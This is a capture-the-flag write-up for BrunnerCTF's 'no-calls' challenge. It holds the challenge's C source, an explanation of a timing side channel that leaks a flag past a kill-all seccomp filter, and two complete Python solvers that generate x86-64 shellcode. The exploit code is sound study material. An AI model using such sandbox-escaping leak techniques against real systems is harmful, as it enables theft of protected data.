BrunnerCTF 2024 — misc_no-calls
Author: Migsej
Solver: McShoothy
Platform: brunnerctf.dk
Challenge Description
The chef's special cake needs to be delivered soon. He already showed you where it's stashed, but maybe you weren't paying attention.
His phone is dead, so no calls are going through. Can you find another way to reach him before it's too late? Tick-tock...
Reverse Engineering chall.c
// chall.c
#include <unistd.h>
#include <stdlib.h>
#include <linux/seccomp.h>
#include <syscall.h>
#include <sys/prctl.h>
#define CODE_LEN 4096
// Map ./flag.txt into memory and report its size and address.
//   len: out-parameter, receives st.st_size of the file.
//   buf: out-parameter, receives the pointer returned by mmap
//        (PROT_READ, MAP_SHARED mapping of the whole file).
// The results of open/fstat/mmap are not checked, and fd is never closed
// in this function.
void read_flag(int *len, char **buf) {
    int fd = open("./flag.txt", O_RDONLY);
    struct stat st;
    fstat(fd, &st);
    *len = st.st_size;
    *buf = mmap(NULL, *len, PROT_READ, MAP_SHARED, fd, 0);
}
// Install a seccomp filter consisting of a single BPF_RET instruction that
// returns SECCOMP_RET_KILL_PROCESS, so the filter yields that verdict for
// every syscall it is asked about.
void disable_syscalls(void) {
    // no_new_privs is set first; seccomp(2) documents it as a precondition
    // for installing a filter without CAP_SYS_ADMIN.
    prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0);
    struct sock_filter filter_prog[] = {
        { BPF_RET, 0, 0, SECCOMP_RET_KILL_PROCESS },
    };
    // { instruction count, instruction array }
    struct sock_fprog filter = { 1, filter_prog };
    // Return value is not checked.
    syscall(SYS_seccomp, SECCOMP_SET_MODE_FILTER, 0, &filter);
}
// Allocate a CODE_LEN-byte anonymous mapping that is readable, writable and
// executable, fill it with up to CODE_LEN bytes from fd 0 (stdin), and
// return its address. A single read() is issued, so fewer than CODE_LEN
// bytes may be stored; neither mmap nor read is checked for failure.
void *read_code(void) {
    void *code = mmap(NULL, CODE_LEN, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, -1, 0);
    read(0, code, CODE_LEN);
    return code;
}
// Entry point: map the flag, print two banner lines and the flag's address,
// read the user's code from stdin, install the seccomp filter, then jump
// into the user's code.
int main() {
    setbuf(stdout, NULL);  // unbuffered stdout
    char *flag;
    int flag_len;
    read_flag(&flag_len, &flag);
    puts("I will execute whatever code you want... as long as it has no syscalls :)");
    puts("Here is the address of the flag good luck");
    printf("%p\n", flag);  // third output line: address of the flag mapping
    // The code is read before the filter goes in, while read() is still allowed.
    void *code = read_code();
    disable_syscalls();
    goto *code;  // computed goto (GNU C extension): jump to the address held in `code`
    return 0;  // NOTE(review): presumably never reached unless the injected code jumps back
}
Idea:
The service maps the flag, prints the flag's runtime address (newly generated on every run), reads our shellcode into RWX memory, then installs a seccomp filter that kills the process on any syscall. So we have to execute shellcode and somehow exfiltrate the flag without making a single syscall.
Logically, only a timing-based attack makes sense, so I have to exploit a timing side channel: different execution durations encode bit 0 or 1.
Limitations:
- Shellcode cannot call write/read/exit.
- Only pure computation and memory reads remain.
- We exploit a timing side channel: different execution duration (short path vs long busy loop) encodes bit 0 or 1.
- Since we cannot exit cleanly, we intentionally crash (NULL deref) so the client can observe the total elapsed time.
Exploit Approach
- Connect to the service.
- Parse the flag pointer that the binary so kindly prints.
- For each byte and bit:
- Generate shellcode that checks that exact bit of the flag in memory.
- If the bit is 1 the shellcode runs a big fat delay loop before crashing.
- If the bit is 0 the shellcode skips straight to crashing.
- Crashing is not a bug here, it is a feature.
- Measure total runtime between sending shellcode and crash.
- Classify the bit as 0 or 1 depending on the timing.
- Repeat until the flag materializes.
(a cool diagram to visualize this:)
Shellcode:
movabs rsi, FLAG_ADDR+offset
mov al, [rsi]
test al, BIT_MASK
jz skip
mov ecx, 0x10000000 ; big loop counter
timing_loop:
dec ecx
jnz timing_loop
skip:
xor eax, eax
mov rax, [rax] ; null deref to crash
If the bit is set it burns cycles before crashing. If not it crashes instantly. Two distributions, easy to tell apart based on timing.
The Solver Script
Here's my solve:
import socket, ssl, struct, re, time, sys
# Endpoint the solver connects to over TLS.
# NOTE(review): 'CTF.zyx' looks like a placeholder host - set the real one before running.
HOST = 'CTF.zyx'
PORT = 443
# Value create_shellcode() uses for the counter of the payload's delay loop.
LOOP_COUNT = 0x10000000
# Cut-offs in seconds that leak_flag() applies to measure_bit() timings.
THRESHOLD = 1.5 # avg exec time above => bit=1
FAST_EXIT = 0.55 # quick return => bit=0
SAMPLES = 2 # extra measurements (total = 1+SAMPLES)
def get_conn_and_addr():
    """Open a TLS connection to the challenge and parse the printed flag address.

    The banner is read until three newlines have arrived (the service prints
    two text lines followed by the pointer) or the peer closes the
    connection; the first ``0x...`` token in it is taken as the address.

    Certificate verification is switched off (no hostname check, CERT_NONE).

    Returns:
        tuple: ``(sock, addr)`` - the still-open TLS socket, ready to receive
        the shellcode, and the flag address as an int.

    Raises:
        RuntimeError: No hex address was found in the banner.
        OSError: Connecting or reading failed.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    sock = ctx.wrap_socket(socket.socket(), server_hostname=HOST)
    try:
        sock.connect((HOST, PORT))
        data = b""
        while data.count(b'\n') < 3:
            chunk = sock.recv(1024)
            if not chunk:
                break
            data += chunk
        m = re.search(r'0x[0-9a-fA-F]+', data.decode(errors='ignore'))
        if not m:
            raise RuntimeError("Flag addr not found")
    except BaseException:
        # The caller never sees the socket on failure, so release it here.
        sock.close()
        raise
    return sock, int(m.group(), 16)
def create_shellcode(base, off, bit, loop_count=None):
    """Build x86-64 shellcode that leaks one flag bit through its run time.

    The payload loads the byte at ``base + off``, tests bit ``bit`` and:

    * bit clear - jumps straight to a null-pointer read (immediate crash);
    * bit set   - counts ``loop_count`` down to zero first, then crashes.

    Args:
        base: Address of the flag mapping printed by the service.
        off: Byte offset into the flag.
        bit: Bit index 0-7 inside that byte (``struct.error`` if the mask
            does not fit in one byte).
        loop_count: Delay-loop iterations, must be >= 1 (0 would wrap the
            64-bit counter). Defaults to ``LOOP_COUNT << 7``.

    Returns:
        bytes: The 37-byte payload.
    """
    if loop_count is None:
        # NOTE(review): assumes roughly one dec/jnz iteration per core cycle.
        # LOOP_COUNT (2**28) alone would then finish in about a tenth of a
        # second, i.e. below FAST_EXIT, so the default is stretched by 2**7.
        # Tune for the target machine.
        loop_count = LOOP_COUNT << 7
    addr = base + off
    mask = 1 << bit

    # In 64-bit mode the one-byte 0x48-0x4f opcodes are REX prefixes, not
    # `dec reg`, so the decrement must use the two-byte FF /1 form.
    delay = b"\x48\xb9" + struct.pack("<Q", loop_count)  # mov rcx, loop_count
    delay += b"\x48\xff\xc9"                             # dec rcx
    delay += b"\x75\xfb"                                 # jnz -5 (back to dec rcx)

    crash = b"\x48\x31\xc0"                              # xor rax, rax
    crash += b"\x48\x8b\x00"                             # mov rax, [rax] -> crash

    sc = b"\x48\xbe" + struct.pack("<Q", addr)           # mov rsi, addr
    sc += b"\x8a\x06"                                    # mov al, [rsi]
    sc += b"\xa8" + struct.pack("B", mask)               # test al, mask
    # Displacement is derived from the delay block so it always lands on
    # the first byte of the crash stub.
    sc += b"\x74" + struct.pack("B", len(delay))         # jz crash
    return sc + delay + crash
def measure_bit(off, bit):
    """Run one timing probe for bit ``bit`` of flag byte ``off``.

    Opens a fresh connection, sends shellcode built for the address that
    connection printed, and waits until the peer closes the connection, a
    socket error occurs, or a 2-second receive timeout fires.

    Args:
        off: Byte offset into the flag.
        bit: Bit index inside that byte.

    Returns:
        float: Seconds elapsed from just before the send until the wait ended.

    Raises:
        RuntimeError, OSError: Propagated from connecting or sending.
    """
    sock, base = get_conn_and_addr()
    try:
        payload = create_shellcode(base, off, bit)
        sock.settimeout(2)
        start = time.monotonic()
        # sendall: a short write would deliver a truncated payload.
        sock.sendall(payload)
        try:
            while sock.recv(1024):
                pass
        except OSError:
            # Timeout, reset or TLS error all just end the measurement.
            pass
        return time.monotonic() - start
    finally:
        sock.close()
def leak_flag(max_len=50):
    """Recover the flag one bit at a time from measure_bit() timings.

    Each bit is probed once. A time below FAST_EXIT means 0, above THRESHOLD
    means 1; anything in between is re-measured SAMPLES more times and the
    mean of all measurements is compared with THRESHOLD.

    Args:
        max_len: Maximum number of bytes to attempt.

    Returns:
        str: The recovered characters; bytes outside printable ASCII appear
        as a literal ``\\xNN`` escape. Stops early at an all-zero byte or
        after a ``}``.
    """
    recovered = []
    for off in range(max_len):
        print(f"[+] Byte {off}: ", end="", flush=True)
        bval = 0
        for bit in range(8):
            first = measure_bit(off, bit)
            if first < FAST_EXIT:
                is_set = False
            elif first > THRESHOLD:
                is_set = True
            else:
                # Grey zone: gather extra samples and decide on the mean.
                samples = [first]
                samples.extend(measure_bit(off, bit) for _ in range(SAMPLES))
                is_set = sum(samples) / len(samples) > THRESHOLD
            if is_set:
                bval |= 1 << bit
            print("1" if is_set else "0", end="", flush=True)

        if not bval:
            print(" -> \\x00 (stop)")
            break

        printable = 32 <= bval < 127
        ch = chr(bval) if printable else f"\\x{bval:02x}"
        recovered.append(ch)
        so_far = ''.join(recovered)
        print(f" -> {ch} | {so_far}")
        if ch == '}':
            break
    return ''.join(recovered)
def main():
    """Run the leak and print the flag; exit with status 1 on any error."""
    print("[*] Timing leak start")
    try:
        print(f"\n[FLAG] {leak_flag()}")
    except Exception as err:
        print(f"[!] Error: {err}")
        sys.exit(1)


if __name__ == "__main__":
    main()
Highlights:
- Parses the flag address and generates the shellcode.
- If the first measurement is clearly fast (0) or slow (1) it stops right there and does not take the average.
- If the timing is in the grey zone it takes two more measurements (three in total), averages them, and decides.
Timing Measurements
Locally I measured:
- Fast crash (bit=0) around 0.1–0.5s
- Slow crash (bit=1) around 9.5-10.2s
Thresholds used for the real solve:
- time to execute < 0.55s --> 0
- time to execute > 1.5s --> 1
- If not sure --> average three samples and compare to 1.5s
This gave a good balance of speed and accuracy.
Why Crash Instead of Loop Forever
An infinite loop would just look like a hang until timeout. That gives only one timing bucket which is boring. By crashing deliberately I get fast versus slow closures, which is exactly what we want. Also crashing the service feels a little naughty.
Result
The flag comes out cleanly:
========================================
Server output:
I will execute whatever code you want... as long as it has no syscalls :)
Here is the address of the flag good luck
0x7fda3196b000
flag add: 0x7fda3196b000
Byte 0...
Bit 0: [DEBUG] flag address: 0x7f412d869000
[DEBUG] Execution time: 0.2562s
first_time: 0.2562s (<0.52s) -> 0 (early detection)
Bit 1: [DEBUG] flag address: 0x7f78c4817000
Timeout --> 1
[DEBUG] Execution time: 2.0006s
...
...
...
[DEBUG] Execution time: 0.3861s
first_time: 0.3861s (<0.52s) -> 0 (early detection)
Byte 32: 0x7d = '}'
************* 'brunner{are_syscalls_even_useful}' *************
Flag ending detected ('}' character)
========================================
LEAKED FLAG: brunner{are_syscalls_even_useful}
========================================
Future CTF Ideas
- Do not print the flag address up front, make players leak it themselves.
- Add watchdog timers so very long loops risk getting killed too.
- Sprinkle in artificial jitter just to make shellcode more intuitive.
Slower but more broadly applicable version (more robust and easier to adapt to other challenges):
#!/usr/bin/env python3
import socket
import ssl
import struct
import re
import time
import sys
def connect_to_challenge(host='CTF.xyz', port=443):
    """Open a TLS connection to the challenge service.

    Certificate verification is switched off (no hostname check, CERT_NONE).

    Args:
        host: Server name, also sent as the TLS server_hostname.
        port: TCP port.

    Returns:
        ssl.SSLSocket: The connected socket; the caller must close it.

    Raises:
        OSError: Wrapping or connecting failed (the socket is closed first).
    """
    context = ssl.create_default_context()
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE

    raw = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        ssl_sock = context.wrap_socket(raw, server_hostname=host)
    except BaseException:
        raw.close()
        raise
    try:
        ssl_sock.connect((host, port))
    except BaseException:
        # Nobody else holds a reference yet, so release the descriptor here.
        ssl_sock.close()
        raise
    return ssl_sock
def get_flag_address():
    """Connect once, print the banner, and return the flag address it contains.

    Reads until three newlines have arrived or the peer closes, then returns
    the first line that starts with ``0x``/``0X`` parsed as hex. The
    connection is closed before returning, so the address describes a
    process this function no longer talks to; e_time() parses the address
    again on each of its own connections.

    Returns:
        int: The flag address printed on this connection.

    Raises:
        RuntimeError: No line of the banner starts with ``0x``.
        OSError: Connecting or reading failed.
    """
    s = connect_to_challenge()
    try:
        data = b""
        while data.count(b'\n') < 3:
            chunk = s.recv(1024)
            if not chunk:
                break
            data += chunk
    finally:
        # Close even when recv raises.
        s.close()

    output = data.decode('utf-8', errors='ignore')
    print(f"Server output:\n{output}")
    for line in output.strip().split('\n'):
        if line.startswith(('0x', '0X')):
            flag_addr = int(line, 16)
            print(f"flag add: {hex(flag_addr)}")
            return flag_addr
    raise RuntimeError("Could not find flag add in output")
def create_timing_shellcode(flag_addr, byte_offset, bit_position, loop_count=1 << 35):
    """Build x86-64 shellcode that leaks one flag bit through its run time.

    The payload loads the byte at ``flag_addr + byte_offset``, tests bit
    ``bit_position`` and:

    * bit clear - jumps straight to a null-pointer read (immediate crash);
    * bit set   - counts ``loop_count`` down to zero first, then crashes.

    Args:
        flag_addr: Address of the flag mapping printed by the service.
        byte_offset: Byte offset into the flag.
        bit_position: Bit index 0-7 (``struct.error`` if the mask does not
            fit in one byte).
        loop_count: Delay-loop iterations, must be >= 1 (0 would wrap the
            64-bit counter).
            NOTE(review): the default assumes roughly one dec/jnz iteration
            per core cycle, which puts 2**35 iterations at several seconds;
            tune for the target machine.

    Returns:
        bytes: The 37-byte payload.
    """
    target_addr = flag_addr + byte_offset
    bit_mask = 1 << bit_position

    # Delay block. In 64-bit mode the one-byte 0x48-0x4f opcodes are REX
    # prefixes, not `dec reg`, so the decrement uses the FF /1 form.
    timing_loop = b"\x48\xb9" + struct.pack("<Q", loop_count)  # movabs rcx, loop_count
    timing_loop += b"\x48\xff\xc9"                             # dec rcx
    timing_loop += b"\x75\xfb"                                 # jnz -5 (back to dec rcx)

    # Crash stub: read from address 0.
    crash = b"\x48\x31\xc0"                                    # xor rax, rax
    crash += b"\x48\x8b\x00"                                   # mov rax, qword ptr [rax]

    shellcode = b"\x48\xbe" + struct.pack("<Q", target_addr)   # movabs rsi, target_addr
    shellcode += b"\x8a\x06"                                   # mov al, byte ptr [rsi]
    shellcode += b"\xa8" + struct.pack("B", bit_mask)          # test al, bit_mask
    # jz over the delay block; the displacement is its length, so the jump
    # lands on the first byte of the crash stub.
    shellcode += b"\x74" + struct.pack("B", len(timing_loop))
    return shellcode + timing_loop + crash
def e_time(shellcode, flag_addr, byte_offset, bit_position):
    """Send one timing probe on a fresh connection and return its duration.

    The flag address is parsed from this connection's banner and a payload is
    built for it with create_timing_shellcode_inline(); ``shellcode`` is only
    sent as a fallback when no address can be parsed.

    Args:
        shellcode: Fallback payload used when the banner has no address.
        flag_addr: Unused; kept for call compatibility.
        byte_offset: Byte offset into the flag.
        bit_position: Bit index inside that byte.

    Returns:
        float: Seconds from the end of the send until the peer closed the
        connection, an error occurred, or the 2-second receive timeout fired.
        Returns 0.001 if anything outside the receive loop raised.
        NOTE(review): that sentinel is indistinguishable from a very fast
        probe, so callers will read a failed connection as bit 0.
    """
    s = None
    try:
        s = connect_to_challenge()
        data = b""
        while data.count(b'\n') < 3:
            chunk = s.recv(1024)
            if not chunk:
                break
            data += chunk
        output = data.decode('utf-8', errors='ignore')

        hex_match = re.search(r'0x[0-9a-fA-F]+', output)
        if hex_match:
            current_flag_addr = int(hex_match.group(), 16)
            print(f" [DEBUG] flag address: {hex(current_flag_addr)}")
            current_shellcode = create_timing_shellcode_inline(current_flag_addr, byte_offset, bit_position)
        else:
            print(" WRONG!, shellcode no working here")
            current_shellcode = shellcode

        # sendall: a short write would deliver a truncated payload.
        s.sendall(current_shellcode)
        # Monotonic clock: immune to wall-clock adjustments during the probe.
        sent_at = time.monotonic()
        try:
            s.settimeout(2.0)
            while True:
                chunk = s.recv(1024)
                if not chunk:
                    break
        except socket.timeout:
            print(" Timeout --> 1")
        except Exception as e:
            print(f" [DEBUG] Connection closed: {e}")
        execution_time = time.monotonic() - sent_at
        print(f" [DEBUG] Execution time: {execution_time:.4f}s")
        return execution_time
    except Exception as e:
        print(f" [DEBUG] Exception in e_time: {e}")
        import traceback
        traceback.print_exc()
        return 0.001
    finally:
        # Runs on every path, so the socket no longer leaks on errors.
        if s is not None:
            s.close()
def create_timing_shellcode_inline(flag_addr, byte_offset, bit_position, loop_count=1 << 35):
    """Build the timing payload that e_time() sends for one flag bit.

    The payload loads the byte at ``flag_addr + byte_offset``, tests bit
    ``bit_position`` and either crashes at once on a null-pointer read (bit
    clear) or first counts ``loop_count`` down to zero (bit set).

    Args:
        flag_addr: Address of the flag mapping printed by the service.
        byte_offset: Byte offset into the flag.
        bit_position: Bit index 0-7 (``struct.error`` if the mask does not
            fit in one byte).
        loop_count: Delay-loop iterations, must be >= 1 (0 would wrap the
            64-bit counter).
            NOTE(review): the default assumes roughly one dec/jnz iteration
            per core cycle, which puts 2**35 iterations at several seconds;
            tune for the target machine.

    Returns:
        bytes: The 37-byte payload.
    """
    target_addr = flag_addr + byte_offset
    bit_mask = 1 << bit_position

    # In 64-bit mode byte 0x49 is a REX prefix rather than `dec ecx`, so the
    # counter is decremented with the REX.W FF /1 encoding instead.
    timing_loop = b"".join((
        b"\x48\xb9", struct.pack("<Q", loop_count),  # movabs rcx, loop_count
        b"\x48\xff\xc9",                             # dec rcx
        b"\x75\xfb",                                 # jnz -5 (back to dec rcx)
    ))
    crash = b"".join((
        b"\x48\x31\xc0",                             # xor rax, rax
        b"\x48\x8b\x00",                             # mov rax, qword ptr [rax]
    ))
    prologue = b"".join((
        b"\x48\xbe", struct.pack("<Q", target_addr),  # movabs rsi, target_addr
        b"\x8a\x06",                                  # mov al, byte ptr [rsi]
        b"\xa8", struct.pack("B", bit_mask),          # test al, bit_mask
        # jz over the delay block, landing on the first byte of the crash stub
        b"\x74", struct.pack("B", len(timing_loop)),
    ))
    return prologue + timing_loop + crash
def leak_flag_bit_by_bit(flag_addr, estimated_flag_length=50):
    """Recover the flag one bit at a time from e_time() measurements.

    Each bit is probed once. A time above 1.5 s means 1 and below 0.55 s
    means 0; anything in between is probed twice more and the mean of the
    three times is compared with 1.5 s.

    Args:
        flag_addr: Passed through to create_timing_shellcode() and e_time().
        estimated_flag_length: Maximum number of bytes to attempt.

    Returns:
        str: The recovered characters. Stops early at an all-zero byte or
        after a ``}``.
    """
    slow_cutoff = 1.5   # seconds; above this the bit is taken as 1
    fast_cutoff = 0.55  # seconds; below this the bit is taken as 0
    leaked_flag = ""
    for byte_offset in range(estimated_flag_length):
        current_byte = 0
        print(f"\nByte {byte_offset}...")
        for bit_pos in range(8):
            print(f" Bit {bit_pos}:", end="")
            shellcode = create_timing_shellcode(flag_addr, byte_offset, bit_pos)
            first_exec_time = e_time(shellcode, flag_addr, byte_offset, bit_pos)
            # The labels are formatted from the cut-offs actually tested so
            # the log cannot disagree with the decision.
            if first_exec_time > slow_cutoff:
                current_byte |= (1 << bit_pos)
                print(f" first_time: {first_exec_time:.4f}s (>{slow_cutoff}s) -> 1 (early detection)")
                continue
            if first_exec_time < fast_cutoff:
                print(f" first_time: {first_exec_time:.4f}s (<{fast_cutoff}s) -> 0 (early detection)")
                continue

            # Borderline: take two more probes and decide on the mean.
            print(f" first_time: {first_exec_time:.4f}s (borderline)", end="")
            times = [first_exec_time]
            for _ in range(2):
                times.append(e_time(shellcode, flag_addr, byte_offset, bit_pos))
                time.sleep(0.01)
            avg_time = sum(times) / len(times)
            print(f" avg_time: {avg_time:.4f}s", end="")
            if avg_time > slow_cutoff:
                current_byte |= (1 << bit_pos)
                print(f" (>{slow_cutoff}s) -> 1")
            else:
                print(f" (<={slow_cutoff}s) -> 0")

        if current_byte == 0:
            print(f" Byte {byte_offset}: NULL byte detected - likely end of flag")
            break

        # current_byte is assembled from bits 0-7 only, so chr() cannot fail.
        char = chr(current_byte)
        leaked_flag += char
        print(f" Byte {byte_offset}: 0x{current_byte:02x} = '{char}'")
        print(f" ************* '{leaked_flag}' ************* ")
        if char == '}':
            print(" Flag ending detected ('}' character)")
            break
        print(f" CURRENT FLAG: '{leaked_flag}'")
        print(f" FLAG LENGTH SO FAR: {len(leaked_flag)} bytes")
    return leaked_flag
def main():
    """Fetch a flag address, run the bit-by-bit leak, and print the result.

    Any exception is reported on stdout as ``Error: ...`` and swallowed.
    """
    try:
        address = get_flag_address()
        print(f"LEAKED FLAG: {leak_flag_bit_by_bit(address)}")
    except Exception as err:
        print(f"Error: {err}")


if __name__ == "__main__":
    main()